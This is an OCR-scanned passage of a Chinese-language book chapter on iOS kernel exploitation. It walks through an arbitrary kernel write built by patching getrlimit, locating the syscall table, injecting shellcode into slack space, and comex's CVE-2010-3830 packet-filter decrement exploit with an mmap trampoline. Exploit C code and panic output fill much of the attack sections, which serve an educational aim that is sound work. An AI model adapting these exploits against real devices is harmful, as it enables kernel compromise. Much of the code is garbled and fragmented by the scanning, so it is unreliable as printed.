AVAILABLE_ MAC _ OS_XxX VERSION_10_5_AND_ LATER; 

该 函数 调用 用 到 了 可 以 提供 广泛 用 途 的 大 量 参数 ,前 两 个 参数 定义 了 到 驱动 程序 的 连接 和 被 
调用 函数 的 数字 索引 。 接 下 来 的 4 个 参数 描述 了 输入 该 外 部 方法 的 参数 ,而 剩 下 的 4 个 参数 描述 了 
可 能 的 输出 参数 。 输 入 和 输出 各 有 两 种 参数 类 型 : 标量 和 结构 体 。 标 量 参数 是 64 位 的 整数 ， 而 结 
构 体 参数 是 格式 只 有 内 核 驱动 程序 及 其 用 户 空间 客户 端 知 道 的 任意 数据 结构 。 标 量 输入 和 输出 参 
数 可 以 有 多 个 ， 但 只 有 一 个 结构 体 可 以 作为 输入 和 输出 ， 而 且 必 须 顺 应 结构 体 的 大 小 。 

在 内 核 级 别 ，IOKit 驱 动 程序 可 以 通过 重 写 IoUserclient 类 中 的 若干 不 同方 法 实现 外 部 方 






































图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 








222 第 9 章 ， 内核 的 调试 与 漏洞 攻击 











法 。 最 第 被 重 写 的 方法 是 ExternalMethod ()。 该 方法 不 仅 负 责 找 到 选 定 的 外 部 方法 , 而 且 要 针 
对 需求 检查 提供 的 参数 ,调用 实际 的 方法 , 并 以 正确 的 方式 处 理 输出 。 完 全 重 写 了 该 方法 的 用 户 
客户 端 必 须 确保 把 执行 传递 给 父 方法 ,或 是 完全 靠 自己 实现 一 切 , 而 这 可 能 导致 大 量 的 安全 问题 。 
因此 , 我 们 应 该 认真 地 对 重 写 的 ExternalMethod () 方 法 进行 审查 。 要 实现 这 一 操作 , 更 方便 的 
方式 是 重 写 基础 实现 使 用 的 某 个 辅助 方法 。 这 些 辅助 方法 包括 getaAsyncTargetaAnd 
MethodqForIndex() 、getExternalMethodForIindex() 、getExternalAsyncMethodFor- 
Index() 和 getTargetAndMethodForIindex()。 这 些 方法 每 个 都 应 该 可 以 通过 索引 查找 外 部 方 
法 ,而 且 有 可 能 确定 目标 对 象 。 不 管用 户 客户 端 实现 重 写 了 什么 函数 , 我们 都 必须 检查 它们 是 否 
验证 了 索引 , 并 检查 非法 索引 会 不 会 引起 攻击 者 控制 的 内 存 页 中 进行 的 任意 查找 。 而 且 实 际 的 外 
部 方法 也 要 再 次 审查 ， 看 看 对 函数 参数 的 过 分 信任 有 没有 引发 常见 的 安全 问题 。 

在 对 内 核 缓 存 中 的 IOKit 驱 动 程序 进行 逆向 分 析 以 及 查找 与 1OKit 相 关 的 漏洞 和 时， 配合 上 新 的 
IDA 6.2 中 的 列表 过 滤 功 能 ，idaiostoolkit 中 的 脚本 将 会 非常 好 用 ， 如 图 9-5 所 示 。 








































































































图 9-5”IDA 过 滤 IOKit 驱 动 程序 


9.4 内 核 漏洞 攻击 


本 市 要 讨论 的 是 针对 4 种 常见 漏洞 类 型 的 漏洞 攻击 。 我 们 详细 解释 了 涉及 的 漏洞 ， 并 分 别 展 
示 了 为 这 几 种 漏洞 构建 漏洞 攻击 程序 的 方式 。 我 们 在 讨论 中 提供 了 相关 的 漏洞 攻击 程序 C 语 言 代 
码 片 段 。 不 过 大 家 要 明白 ， 因 为 OS 4.3 内 核 的 引入 ， 目 前 不 存在 禁用 代码 签名 功能 的 捷径 ， 就 是 
以 root 用 户 身 份 也 不 能 禁用 它 。 在 iOS 4.3 之 前 ，root 用户 有 可 能 从 用 户 空间 禁用 
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security.mac.poc_enforce 和 security.mac.vnode_enforce sysct1 数 据 项 。 这 有 可 能 
禁用 代码 签名 机 制 中 的 很 多 种 安全 检查 ， 让 用 户 可 以 从 没有 经 过 正确 签名 的 Mach-O 二 进 制 文件 
运行 内 核 漏洞 攻击 程序 。 不 过 在 引入 了 iOS 4.3 后 ， 这 些 sysct1 数 据 项 都 变 成 只 读 的 了 。 因 此 ， 
针对 版 本 相对 较 新 的 OS 的 内 核 漏 洞 攻 击 程序 全 都 必须 实现 为 百分之百 的 ROP ( 面 对 返 回 的 程序 
设计 ) 有 效 载荷 ， 除 非 它们 是 从 具有 动态 代码 签名 能 力 的 进程 中 启动 的 。 以 非 *oot 用 户 身份 启 
动 内 核 漏洞 攻击 程序 总 是 有 这 一 要 求 。 


9.4.1 任意 内 存 的 重 写 


利用 任意 内 核 内 存 重 写 漏洞 ,攻击 者 可 以 在 内 核 的 地 址 空间 中 随心 所 欲 地 写 入 各 种 内 容 。 虽 
然 这 样 的 漏洞 已 经 被 找到 并 修复 了 , 但 这 个 例子 不 是 要 对 真正 的 漏洞 进行 攻击 , 而 是 告诉 大 家 如 
何 为 内 核 打 补丁 并 介绍 一 个 人 为 制造 的 假 漏洞 。 不过, 在 大 家 着 手 做 这 些 之 前 , 需要 已 经 应 用 过 
越狱 内 核 补丁 的 内 核 二 进 制 文件 ， 而 创建 这 种 文件 最 简单 的 方式 是 使 用 comex 的 内 核 补丁 生成 器 
( kernel patch generator )， 参 见 Github 的 http://github.com/comex/datautils0。 编 译 好 之 后 它 会 给 大 家 
提供 两 个 用 于 创建 越狱 内 核 的 实用 工具 。 不 过 在 这 里 我 们 不 会 介绍 它 提 供 的 实际 内 核 补丁 , 因为 
这 是 第 10 草 要 讨论 的 内 容 。 


$ ./make_kernel_patchfile kernelcache.iPod4,1 4.3.5_8L1.decrypted 

mykernelpatchfile 

$ ./apply_patchfile kernelcache.iPod4,1 4.3.5_8L1.decrypted \ 
mykernelpatchfile kernelcache.iPod4,1 4.3.5_8L1.patched 

vm map_enter (0x80043fc8) 

vm _ map_protect (0x8004115e) 

AMFI (0x80618394) 

-debug_enabled initializer (0x80204d9c) 

task_for pid 0 (0x801a7df6) 

cs_enforcement_disable (0x8027eb5c) 

proc_enforce (0x8029cle4) 

USB power (0x805eab92) 

sb_evaluate hook (0x8061b6d4) 

sb_evaluate (0x80938e9c) 


1. 向 内 核 添加 漏洞 
现在 已 经 有 了 越狱 内 核 的 二 进 制 文件 , 大 家 可 以 自行 向 它 添加 漏洞 了 。 要 完成 该 任务 , 大 家 
必须 在 内 核 二 进 制 文件 中 查找 并 替换 如 下 字 方 : 


Original 68 46 10 22 F7 F6 26 EC F3 E7 00 BF 
Patched 68 46 10 22 F7 F6 70 EE 00 20 F2 E7 
















































































然后 可 以 使 用 iPhone Dev Team 的 redsnow 实 用 工具 引导 打 过 补丁 的 内 核 : 

$ ./redsnO0w -j -k kernelcache.iPod4,1 4.3.5_8L1.patched -a "-V" 

在 继续 之 前 , 先 来 看 看 应 用 的 补丁 , 并 了 解 引入 的 漏洞 。 打 过 补丁 的 代码 位 于 getrlimit () 
系统 调用 之 中 。 而 在 该 系统 调用 的 处 理 程序 中 , 大 家 可 以 在 靠近 结尾 的 地 方 找到 如 下 代码 ， 它 利 
用 copyout () 函数 把 结果 复制 回 用 户 空间 。copyout () 函数 会 检查 目的 地 址 确实 是 否 在 用 户 空 
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间 的 内 存 中 ， 以 确保 不 会 把 结果 写 入 内 核 内 存 。 原 始 代 码 的 反 汇 编 如 下 所 示 : 


80175628 MOV RO, SP 
8017562A MOVS R2, #0x10 
8017562C BLX _Copyout 
80175630 B loc_8017561A 


应 用 的 补丁 会 把 对 copyout () 的 调用 改 为 对 ovbcopy () 的 调用 ， 而 ovbcopy () 不 会 执行 任 
何 检查 ， 这 样 一 来 就 可 以 把 目标 地 址 指定 为 内 核 内 存 中 的 任何 位 置 。 除 此 之 外 , 应 用 的 补丁 还 会 
清除 Ro 寄 存 器 ， 让 这 看 起 来 像 是 一 次 成 功 的 复制 操作 。 相 应 的 汇编 代码 是 下 面 这 样 的 : 

















80175628 MOV RO, SP 
8017562A MOVS R2, #0x10 
8017562C BLX _ovbcopy 
80175630 MOVS RO, #0 
80175632 B loc_8017561A 


这 意味 着 通过 将 指向 内 核 内 存 的 指针 作为 第 二 个 参数 ， 大 家 可 以 把 getr1limit () 系统 调用 
的 结果 写 入 内 核 内 存 : 

getrlimit (RLIMIT_ CORE, 0x80101010); 

因为 这 个 漏洞 让 大 家 可 以 把 rlimit 结 构 体 写 入 内 核 内 存 的 任意 位 置 ， 所 以 你 一 定 要 了 人 解 一 
下 它 的 定义 : 

struct rlimit { 


rlim 七 rlim cur; /* 当前 的 ( 软 ) 限制 */ 
rlim t rlim max; /* 硬 限 制 */ 





}; 

在 iOS 中 ,rlim_t 数 据 类 型 是 64 位 的 无 符号 整数 ,不 过 这 64 位 中 我 们 只 用 到 了 63 位 。 最 高 位 
应 该 是 0。 因 此 ， 能够 任意 选择 的 只 有 结果 的 前 7 个 字 节 。 不 过 这 不 成 问题 ， 因 为 大 家 可 以 重复 执 
行 漏洞 攻击 程序 。 还 有 一 个 限制 就 是 不 允许 *lim_cur 的 值 大 于 zlim_max 的 值 。 这 意味 着 漏洞 攻 
击 代码 需要 使 用 一 开始 被 设置 为 无 限 (所 有 63 位 ) 的 资源 限制 ， 否 则 写 入 的 就 不 是 全 部 7 个 字 节 
了 。 在 RLIMIT_CORE 的 情况 中 ， 这 是 默认 的 。 所 以 ,要 把 11 22 33 44 55 66 77 这 些 字 节 写 
入 内 核 ， 我们 就 必须 这 样 做 : 

getrlimit (RLIMIT CORE, &rlp); 

rip,.rlim cur = 0x77665544332211; 


setrlimit (RLIMIT CORE, &rlp); 
getrlimit (RLIMIT CORE, 0x80101010); 


要 问 内 核 写 入 任意 数量 的 数据 , 我 们 就 要 
的 函数 中 : 
void writeToKernel (unsigned char *addr, unsigned char *buffer, 


size t len) 


{ 





















































这 个 漏洞 攻击 程序 包装 到 某 个 会 重复 使 用 该 漏洞 





[号 


struct rlimit rlp; 

getrlimit (RLIMIT CORE, &rlp); 

while (len > 7) { 
memcpy (&rlp, buffer, 7); 
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setrlimit (RLIMIT CORE, &rlp); 
getrlimit (RLIMIT CORE, addr); 
len -= 7; buffer += 7; addr += 7; 





} 
memcpy (&rlp, buffer, len); 
setrlimit (RLIMIT_CORE 
getrlimit (RLIMIT_ CORFE 





轩 加 


} 

2. 选择 要 重 写 的 目标 

一 旦 可 以 写 入 任何 内 容 , 我 们 就 需要 决定 应 该 重 写 什 么 了 。 从 历史 上 看 , 这 已 经 在 Mac OSX 
的 内 核 漏洞 攻击 程序 中 使 用 过 了 ， 具 体 来 讲 就 是 重 写 内 核 内 存 中 进程 的 用 户 凭 证 来 利用 其 特权 。 
对 于 iOS 和 较 新 的 Mac OS X 内 核 而 言 ， 这 已 经 不 再 够 用 了 ， 因 为 大 家 通常 必须 对 付 内 核 级 的 沙 盒 
机 制 。 只 是 把 进程 的 用 户 ID 改 成 0 不 足以 获得 对 系统 的 完全 访问 。 要 实现 这 一 目标 ， 我 们 需要 重 
写 内 核 级 的 函数 指针 或 保存 的 返回 地 址 ， 并 将 内 核 的 执行 路 径 重 定向 到 自己 的 代码 。 

完成 这 项 工作 的 一 个 方法 是 重 写 系统 调用 表 中 某 个 未 使 用 的 系统 调用 人 处 理 程序 , 然后 通过 调 
用 所 考虑 的 系统 调用 从 用 户 空间 触发 执行 。iOS 包 含 了 相当 多 未 使 用 的 系统 调用 表 项 。 用 来 给 
iPhone 越狱 的 内 核 漏洞 攻击 程序 之 前 就 使 用 了 表 项 0 和 207, 而 没有 遭遇 来 自 其 他 软件 的 麻烦 。 大 
家 在 漏洞 攻击 程序 中 必须 解决 的 第 二 个 问题 是 要 把 代码 引入 可 以 跳 转 到 的 内 核 。 解决 这 个 问题 的 
方法 有 很 多 , 我 们 会 在 接 下 来 的 内 容 中 探讨 其 中 的 几 种 。 这 个 例子 使 用 了 一 种 特定 的 攻击 ， 当 我 
们 可 以 在 内 核 内 存 中 的 任意 位 置 写 人 任意 内 容 时 便 可 使 用 这 种 攻击 。 大 家 用 自己 的 代码 重 写 了 内 
核 内 存 中 可 执行 且 可 写 的 闲置 空间 。 例 如 ， 所 包含 的 各 个 内 核 扩展 都 具有 Mach-O 头 部 ， 而 在 头 
部 的 结尾 与 下 一 段 内 容 的 开头 之 间 就 存在 一 些 未 使 用 的 空间 。 

对 于 该 漏洞 攻击 程序 来 说 , 这 意味 着 大 家 必须 知道 系统 调用 表 和 内 核 内 存 中 闲置 空间 的 确切 
位 置 。 因 为 内 核 级 别 是 不 存在 ASLR 保 护 的 ， 所 以 这 些 地 址 对 于 相同 的 设备 和 内 核 版 本 而 言 是 静 
态 的 ， 对 于 所 有 已 发 布 的 固件 版 本 来 说 都 一 次 性 找 出 来 即 可 。 要 涵盖 所 有 版 本 的 iOS 4， 在 不 考 
虑 支持 Apple TV 的 情况 下 ,最 多 只 可 能 有 81 个 不 同 的 地 址 。 不 过 ,这些 地 址 中 有 些 是 相同 的 , 一 
方面 因为 不 是 每 个 版 本 的 OS 都 会 引入 〔 较 大 的 ) 内 核 改 动 ， 而 男 一 方面 是 因为 对 于 那些 使 用 了 
相同 型 号 处 理 器 的 设备 而 言 ， 主 内 核 代 码 段 的 每 个 字 节 都 是 相同 的 。 因 此 , 大 家 可 以 编写 一 个 脚 
本 ， 为 所 有 可 用 的 内 核 找到 这 些 地 址 ， 并 为 自己 的 内 核 漏洞 攻击 程序 创建 查找 表 。 

3. 定位 系统 调用 表 

在 近期 的 内 核 更 新 之 后 , 定位 系统 调用 表 更 难 了 , 因为 苹果 公司 已 经 移动 了 一 些 内 核 符号 并 
彻底 删除 了 一 些 。 以 前 我 们 可 以 利用 kaebug_enable 这 样 的 符号 轻松 定位 系统 调用 表 ， 而 定位 
系统 调用 表 的 新 方法 则 依赖 于 表 中 第 一 项 的 结构 ,以 及 它 相 对 于 nsysent 变 量 的 位 置 。 系统 调 用 
表 中 的 数据 项 叫 作 sysent: 


































































































struct sysent { /* 系统 调用 表 */ 
int16_t sy_narg; /* 参数 数量 */ 
int8_t sy_resv; /* 保留 的 */ 
int8_t sy_flags; /* 标志 */ 
sy_call t *sy_call; /* 实现 吕 数 */ 
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sy_munge t *sy_arg_munge32; /* 32 位 的 系统 调用 参数 改写 */ 

sy_munge t *sy_arg munge64; /* 64 位 的 系统 调用 参数 改写 */ 

int32_t sy_return_ type; /* 系统 调用 的 返回 类 型 */ 

uint16_t sy_arg_bytes; /* 32 位 系统 调用 中 所 有 参数 的 总 大 小 ， 单 位 是 字 节 
要 大 


上 3 
因为 系统 调用 表 的 第 一 项 其 实 不 是 已 实现 的 系统 调用 , 所 以 其 结构 体 中 的 大 部 分 元 素 都 会 被 
初始 化 为 0。 被 设置 了 的 字段 只 有 sy_return_type 和 sy_call。 返回 类 型 被 初始 化 为 值 1, 而 且 
处 理 程序 是 某 个 指向 内 核 代码 段 的 指针 。 因 此 ， 如 果 数 据 与 第 一 项 的 定义 匹配 ,大 家 就 可 以 扫描 
与 这 些 数 据 对 应 的 数据 段 。 为 验证 自己 找到 了 系统 调用 表 , 大 家 可 以 利用 nsysent 变 量 是 紧 接着 
系统 调用 表 存储 这 一 事实 。 这 意味 着 , 大 家 可 以 首先 猜测 一 个 系统 调用 数量 , 然后 验证 snsysent 
= &sysent + sizeof(sysent) * nsysent 是 否 成 立 ， 如 果 不 成 立 ， 就 要 继续 增 大 这 个 数字 
直到 达到 一 个 很 大 的 数字 ， 而 且 不 得 不 认为 自己 猜测 的 sysent 的 地 址 是 错 的 。 这 种 情况 下 大 家 
就 要 继续 在 数据 段 中 查找 真正 的 第 一 项 。 

idaiostoolkit 包 含 了 一 个 这 样 的 脚本 ， 它 可 以 自动 完成 这 种 查找 ， 并 利用 XNU 源 代码 中 
的 syscalls.master 文 件 为 系统 调用 处 理 程 序 设置 所 有 的 符号 和 区 数 类 型 。 下 面 就 是 对 用 于 iPod 4 的 
iOS 4.3.5 固 件 使 用 该 脚本 产生 的 输出 : 

Found syscall table _sysent at 802926e8 


Number of entries in syscall table nsysent = 438 
Syscall number count _nsysent is at 80294ff8 


4. 构建 漏洞 攻击 程序 

寻找 合适 的 闲置 空间 就 简单 得 多 了 ， 我 们 只 需 检查 内 核 扩 展 的 Mach-O 头 部 后 的 
__PRELINK_TEXT 数 据 段 有 没有 空闲 空间 。 内 存 中 0x8032B300 到 0x8032c000 之 间 的 这 3328 字 
节 就 是 个 合适 的 空间 ， 大 家 可 以 在 自己 的 漏洞 攻击 程序 中 使 用 这 些 空间 。 

char shellcode[] = "\x01\x20\x02\x21\x03\x22\x04\x23\xFF\xFF"; 

struct sysent scentry; 


unsigned char * syscall207 
unsigned char * slackspace 





















































0x802926e8 + 207 * sizeof (scentry); 
0x8032B300; 


memset (&scentry, 0, sizeof(scentry)); 
scentry.sy_call = slackspace + 1; 
scentry.sy_return type = 1; 


writeToKernel (slackspace, &shellcode, sizeof (shellcode)); 
writeToKernel (syscall207, &scentry, sizeof (scentry)); 
syscall (207); 


这 个 漏洞 攻击 程序 中 的 shellcode 代 码 是 简单 的 Thumb 模 式 ， 它 会 把 某 些 值 移 人 寄存 器 R0 到 
R3， 然 后 因为 未 定义 的 指令 造成 严重 错误 。 不 过 这 只 是 证 明 发 生 了 茶 种 类 型 的 执行 。 我 们 将 在 第 
10 章 中 讨论 完整 的 内 核 级 有 效 载 荷 。 


MOVS RO, #1 
MOVS R1, #2 
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MOVS R2, #3 

MOVS R3 ， #4 

UNDEFINED 

我 们 的 漏洞 攻击 程序 在 执行 时 会 导致 内 核发 生 严 重 错 误 , 而 且 严 重 错误 日 志 显 示 这 里 的 代码 
得 到 了 执行 而 且 寄 存 器 也 被 装 入 了 相应 的 内 容 。 程 序 计数 器 Pc 表 明 在 执行 来 源 于 闲置 空间 的 某 条 
未 定义 内 核 指令 时 发 生 了 崩溃 ， 而 R5 寄 存 器 的 值 暗 示 了 系统 调用 处 理 程序 207 的 执行 。 

panic(cpu 0 caller 0x8006fcf8) : undefined kernel instruction 

r0: 0x00000001 1: 0x00000002 r2: 0x00000003 r3: 0x00000004 

r4: 0x856e02e0 r5: 0x000000cf r6: Oxc0a886ac L7: 0xcd273fa8 

r8: 0x00000001 r9: 0xc0a884b0 r10: 0x80293a50 r11: 0x832b8244 


12: 0x00000000 sp: Oxcd273f£f90 lr: 0x801a96e8 pc: 0x8032b308 
cpsr: 0x20000033 fsr: 0x856e02e0 far: 0xcd273fa8 


这 应 该 足以 说 明 ， 如果 能 直接 向 内 核 内 存 写 数据 ,让 任意 内 核 代码 执行 会 非常 容易 。 如 果 漏 
洞 不 能 让 大 家 随心 所 欲 地 写 数据 ， 而 对 可 能 写 入 的 值 加 以 限制 ， 漏 洞 攻击 就 会 更 加 困难 。 不 过 ， 
下 一 节 要 讨论 的 漏洞 表明 , 即便 是 只 能 对 内 核 内 存 进行 非常 有 限 的 操纵 , 我 们 也 还 是 有 可 能 让 任 
意 代 码 执行 。 


9.4.2 未 初始 化 的 内 核 变 量 


这 种 漏洞 攻击 会 导致 内 核 结构 中 未 初始 化 的 指针 元 素 被 装 入 来 自用 户 空间 的 数据 ,该 漏洞 位 
于 包 过 滤 设 备 的 IOCTL 处 理 程序 中 ，comex 发 现 了 该 漏洞 并 编写 了 漏洞 攻击 程序 。 接 着 他 的 漏洞 
攻击 程序 就 被 用 在 了 针对 iOS 4.1 的 limeraln 越 狱 工 具 中 。 苹 果 公司 在 iOS 4.2.1 中 修复 了 这 个 漏洞 
(也 称 为 CVE-2010-3830 漏 洞 )。 因 此 ， 大 家 只 有 在 运行 iOS 4.1 及 更 低 版 本 的 设备 上 才能 利用 这 一 
漏洞 。 

想 了 解 这 一 漏洞 , 大 家 可 以 看 看 包 过 滤 设 备 的 IOCTL 处 理 程序 , 因为 它 是 原始 XNU 内 核 源 代 
码 的 一 部 分 。 而 源 代 码 树 需要 足够 旧 ( 例如 xnu-1$04.9.17 )， 以 保证 它 还 存在 这 个 漏洞 。 有 漏洞 
的 IOCTL 处 理 程序 是 在 /bsdmetpt ioctLc 文 件 中 定义 的 ， 其 代码 如 下 所 示 : 

Sl ti 


pfioctl(dev_t dev, u long cmd, caddr t addr, int flags, struct proc *p) 
{ 















































/* 3 */ 

Switch (cmd) { 

/大 就 二 笋 家 刘 生 */ 

Case DIOCADDRULE: { 
struct pfioc _ rule *pr = (Struct pfioc rule *)addr; 
struct pf_ruleset *ruleset; 
struct pf_rule *rule, *tail; 


/* 复制 并 初始 化 部 分 结构 体 */ 

bcopy (&pr->rule, rule, sizeof (struct pf rule) ) ; 
rule->cuid = kauth cred getuid(p->p_ucred); 
rule->cpid = p->p_pid; 

rule->anchor = NULL; 

rule->kif = NULL; 
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TAILO_INIT(&rule->rpool.list); 
/* 初 始 化 引用 计数 */ 

rule->states = 0; 

rule->src nodes = 0; 
rule->entries.tqe prev = NULL; 


a 复制 并 初始 化 部 分 结构 体 */ 
if (rule->overload tblname[0]) { 
if ((rule->overload tbl = pfr attach table(ruleset, 








rule->overload tblname)) == NULL) 
error = EINVAL; 
else 
rule->overload tbl->pfrkt_flags 车 PFR_TFLAG ACTIVE; 


} 

这 段 代码 的 重点 是 : 如 果 overload_tblname 是 空 字符 串 , 结构 体 元 素 overload_tb1 就 不 
会 被 初始 化 。 如 果 代 码 其 他 部 分 也 使 用 了 相同 的 检查 , 那么 这 是 没 问 题 的 , 但 其 他 部 分 只 会 检查 
overload_tb1 是 否 不 是 NULL 指 针 。 如 果 想 对 这 一 缺陷 加 以 利用 , 你 就 必须 触发 对 用 于 删除 规则 
的 pf_rm_rule() 函数 调用 : 
Volid 


pf_rm rule(struct pf _ ruledqueue *rulequeue, struct pf_rule *rule) 


{ 












































if (rulequeue != NULL) { 
if (rule->states <= 0) { 

/* 

* XXX - 在 删除 规则 之 前 ， 我 们 需要 先 删除 该 表 ， 

* 以 确保 该 表 的 代码 不 会 删除 我 们 “脚下 的 锚 点 ” 

内 
pf_tbladdr_remove(&rule->src.addr); 
pf_tbladdr_ remove(&rule->dst.addr); 
if (rule->overload tbl) 

pfr detach table(rule->overload tbl1); 

} 


要 触发 这 样 的 代码 路 径 ， 我 们 只 需要 让 DIOCADDRULE IOCTL 处 理 程序 失败 。 不 过 ， 我 们 也 可 
以 采用 其 他 若干 种 方法 ，comex 就 使 用 了 DIOCCHANGERULEIOCTL 的 PF_CHANGE_REMOVE 行 为 : 
Case DIOCCHANGERULE: 
/* 家 大 
if (pcr->action == PF_CHANGE REMOVE) { 
pf_rm rule(ruleset->rules[rs num] .active.ptr, oldrule); 


ruleset->rules[rs_ num] .active.rcount--; 
} else { 


不 管 选择 哪 种 方法 ,代码 最 后 都 会 调用 pfr_detach_table() 函数 ， 递 减 系统 调用 表 的 引 
用 计数 需 : 
void 


pfr_detach table(struct pfr_ ktable *kt) 
{ 
































lck mtx assert(pf_lock, LCK_ MTX ASSERT_ OWNED); 
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下 


(kt->pfrkt_refcnt [PFR_R 


printf ("pfr_ detach tab 


kt->pfrkt_refcnt [PFR_ R 


EFCNT 
le: re 
EFCNT _. 





RULE] <= 0) 
fcount = %d.\n", 
RULE]); 





else if (!--kt->pfrkt refcnt [PFR REFCNT RULE]) 
7 kt->pfrkt flags&~PFR TFLAG REFERENCED); 


2 


pfr_setflags ktable(kt 


记 住 ,通过 对 overload_tpl 指 针 进 行 相 应 的 设置 ， 攻 击 者 就 可 以 控制 该 函数 中 使 用 的 kt 


指针 。 这 意味 着 用 户 空 





限制 就 是 这 





zs 间 的 进程 可 以 利用 该 漏洞 减 小 存储 在 内 核 内 存 任意 位 置 中 的 整数 。 唯 一 的 


RD ted le te aie 
会 打开 包 过 滤 设 备 ， 并 通过 IOCTIL 重启 该 设备 。 然 后 ， 它 


看 看 comex ee 。 首 先 ， 


会 重复 调用 pwn ( ) 函数 ， 员 数 实现 了 真正 的 沁 洞 攻击 并 会 按照 定义 的 次 数 间 减 所 供 的 地 址 


// 是 的 ， 需 要 重新 打开 
open("/dev/pf", O_RDWR); 
ioctl (pffd, DIOCSTOP); 
assert(!ioctl (pffd, DIOCSTART)); 
while (num decs--) 

pwn(<patchaddress>); 
(!ioctl (pffd, DIOCSTOP)); 
close(pffd); 


函数 中 ,我们 建立 了 必要 的 结构 体 ， 而 且 首先 会 调用 有 漏洞 的 IOCTL 处 理 程序 添加 
随后 立即 删除 该 规则 。 这 会 把 提供 的 内 存 地 址 减 1。 


static void pwn(unsigned int addr) { 


pffd = 


assert 


在 pwn () 
意 规则 并 





st 
st 
st 
st 








ruct pfioc_ trans trans; 
ruct pfioc_ trans_e trans_e; 
ruct pfioc pooladdr pp; 
ruct pfioc rule pr; 
memset (&trans, 0, sizeof (trans)); 


memset (&trans_e, 0, sizeof (trans_e)); 
memset (&pr, 0, sizeof (pr)); 


EE 
te 
te 
te 





ans.size = 1; 


ans.esize = sizeof (trans_ 


ans.array = &trans_e; 
ans_e.rs_num = PF_RULES 








e); 


ET_FILT 


ER; 





memset (trans_e.anchor, 0, 


as 


as 
u. 


sert(!ioctl (pffd, DIOCXB 
U_int32 七 ticket = trans_e.ticket; 





sert(!ioctl (pffd, DIOCBE 


_int32_t pool ticket = pp 





.action = PF_PASS; 
nr = 07 
.ticket = ticket; 


MAXPAT 
EGIN, 





GINADD. 
.ticke 


.pool ticket = pool ticket; 
memset (pr.anchor, 0, MAXPATHLEN); 
memset (pr.anchor_call, 0, 





MAXPAT 





HLEN); 
&trans)); 


7 





HLEN); 
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.return_ icmp 0; 
.action = PF_PASS; 
.af = AF_INET; 

DEOto: = TPPROTO TOP: 
se Qs 
.rpool.proxy_port[0] 
.rpool .proxy_port[1] 





.Src.addr.type 
.dst.addr.type 


.OVverload tbl 


assert(!ioctl (pffd, DIOCADDR 


assert(!ioctl (pffd, DIOCXCOMMIT, 








pr.action 
assert(!ioctl (pffd, DIOCCHAN 








ULE, 





PF_CHANGE _ REMOVE; 


GERULE, 











htons(1); 
ntons(L)s 


PF_ADDR_ADDRMASK; 
PF_ADDR_ADDRMASK; 


&pr)); 


&trans)); 


&pr)); 


(void *) (addr - 0x4a4); 


这 里 最 重要 的 地 方 在 于 , 漏洞 攻击 程序 会 从 大 家 想 要 减 小 的 地 址 上 减 去 0x4a4 这 个 值 。 这 是 
必须 要 做 的 ， 因 为 这 个 值 是 引用 计数 器 在 表 结 构 体 中 的 
现在 可 以 减 小 内 核 内 存 中 任意 地 址 的 值 了 , 但 问题 又 来 了 : 我 们 该 如 何 把 这 一 事实 转化 成 
可 执行 任意 代码 的 漏洞 攻击 程序 呢 ? 可 行 的 方法 相当 多 。 因 为 大 家 可 以 无 限 次 重复 执行 漏洞 攻 
击 程序 ， 所 以 能 将 内 核 代码 的 一 部 分 置 零 ， 这 解码 成 Thumb 代 码 就 是 Movs R0,R0。 这 基本 上 
就 是 条 NoP， 因 此 大 家 可 以 用 它 来 重 写 安 全 检查 。 这 样 一 来 就 可 以 引入 栈 缓冲 区 溢出 这 样 的 新 











漏洞 了 。 


递减 内 核 级 函数 指针 的 








遍 移 量 。 




















最 高 字 节 是 一 种 更 为 简单 的 攻击 。 通 过 反复 地 递减 , 我 们 就 有 可 能 把 


内 核 级 函数 指针 移动 到 用 户 空间 的 内 存 区 域 中 。comex 在 他 的 漏洞 攻击 程序 中 就 利用 了 这 种 方法 ， 
递减 系统 调用 处 理 程序 0 直至 它 指向 用 户 空间 的 内 存 。 随后, 他 利用 mmap () 系统 调用 映射 了 该 地 
址 处 的 内 存 。 然 后 ， 映 射 过 的 内 存 被 装 入 用 来 跳 转 到 漏洞 攻击 程序 代码 段 的 跳板 代码 : 


int 
int 


target_addr 
target_addr_real 
int target_ pagebase 
unsigned int num decs (CONFIG_. 
assert (MAP_FAILED != mmap( (void 

PROT_WRITE, MAP_ANON | MAP_ PRIVA 
unsigned short *p (void *) 
if(target addr real & 2) 

*p++ = Ox4b00; // ldr r3, 
*p++ = Ox4718; // bx r3 

*((unsigned int *) p) 


unsigned 


unsigned 
unsigned 








xP++ = 
[pc] 


(unsigne 


CONFIG_TARG 





ET_ADDR; 





target_addr & ~1; 





3 
加 





Ox46c0; 


Q int) 


E | MAP_FIXED 
target_addr real; 





// nop 


&ok_go; 


assert(!mprotect( (void *)target pagebase, 


0x2000, PROT_READ | PROT 








ExI 





EC) ); 





target_addr & ~0xfff; 
SYSENT_PATCH_ORIG - target_addr) 
target_pagebase, 


>> 24; 
0x2000, PROT_READ | 


0)); 





， -1, 


一 旦 一 切 就 绕 ， 我 们 就 可 以 通过 执行 syscal1 (0) 触 发 任意 的 代码 执行 。 
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9.4.3 ”内 核 栈 缓冲 区 溢出 


之 所 以 会 出 现 内 核 级 的 栈 缓冲 区 溢出 漏洞 , 这 通常 是 因为 向 基于 栈 的 缓冲 区 执行 了 未 受 限 制 
的 复制 操作 。 只 要 这 种 情况 发 生 ， 内 核 栈 中 保存 的 返回 地 址 就 可 以 重 写 并 被 替换 为 指向 我 们 的 
shellcode 代 码 的 指针 。 正 如 我 们 在 之 前 的 几 个 例子 中 看 到 的 ，iOS 人 允许 返回 到 注入 至 可 写 内 核 内 
存 的 代码 , 或 是 返回 到 已 经 存在 于 用 户 空间 内 存 中 的 代码 。 与 用 户 空 间 不 同 , 在 内 核 中 没什么 能 
减缓 漏洞 攻击 程序 ， 因 此 在 iOS 4 中 进行 内 核 级 的 栈 缓冲 区 溢出 攻击 是 非常 容易 的 。 它 几乎 总 可 
以 归结 为 重 写 返回 地 址 并 返回 至 用 户 空间 中 已 经 准备 好 的 代码 。 在 iOS 5 中 执行 这 种 攻击 会 更 复 
杂 一 些 ， 往 往 需 要 用 到 一 些 内 核 级 的 面向 返回 的 程序 设计 。 

这 类 漏洞 中 有 一 个 是 由 pod2g 发 现 的 , 称 为 HFS 旧 系统 卷 名 栈 缓冲 区 溢出 (HFS legacy volume 
name stack buffer overflow )。 引 发 该 漏洞 的 原因 是 : 在 挂 接 旧 系统 的 HFS 文 件 系 统 时 调用 了 不 受 
